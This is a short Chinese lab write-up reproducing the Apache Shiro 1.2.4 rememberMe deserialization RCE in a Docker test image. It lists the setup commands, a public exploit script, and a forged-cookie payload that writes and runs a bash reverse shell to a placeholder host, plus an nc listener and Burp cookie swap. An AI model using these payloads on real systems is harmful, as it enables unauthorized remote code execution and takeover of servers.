1.首先說一句這破漏洞折騰了好久,才復現成功
環境搭建docker
####獲取docker鏡像 docker pull medicean/vulapps:s_shiro_1 ####重啟docker systemctl restart docker ####啟動docker鏡像: docker run -d -p 8081:8080 medicean/vulapps:s_shiro_1 訪問: http://localhost:8081/ 環境搭建成功

2.下載攻擊exp
git clone https://github.com/acgbfull/Apache_Shiro_1.2.4_RCE.git
首先生成一個偽造的cookie
root@Mke:~/Apache_Shiro_1.2.4_RCE# python3 shiro_1.2.4.py "echo '/bin/bash -i >& /dev/tcp/x.x.x.x/8088 0>&1' >> a.txt &&bash a.txt"
注意:這里我這樣寫的原因是因為之前復現好幾次,都無法反彈shell,最后不得已這樣寫,先把反彈shell寫入a.txt,然后再執行反彈shell的操作

3.監聽反彈的端口
nc -lvp 8088

4.登入shiro然后用burpsuite抓取數據包

burpsuite抓包然后進行替換cookie

替換cookie

5.查看監聽端口,是否有shell彈回來

到這里算是復現成功了(qieyiweinabudaoxitongkongzhiquanxianjiubusuanfuxianchenggong!!!)
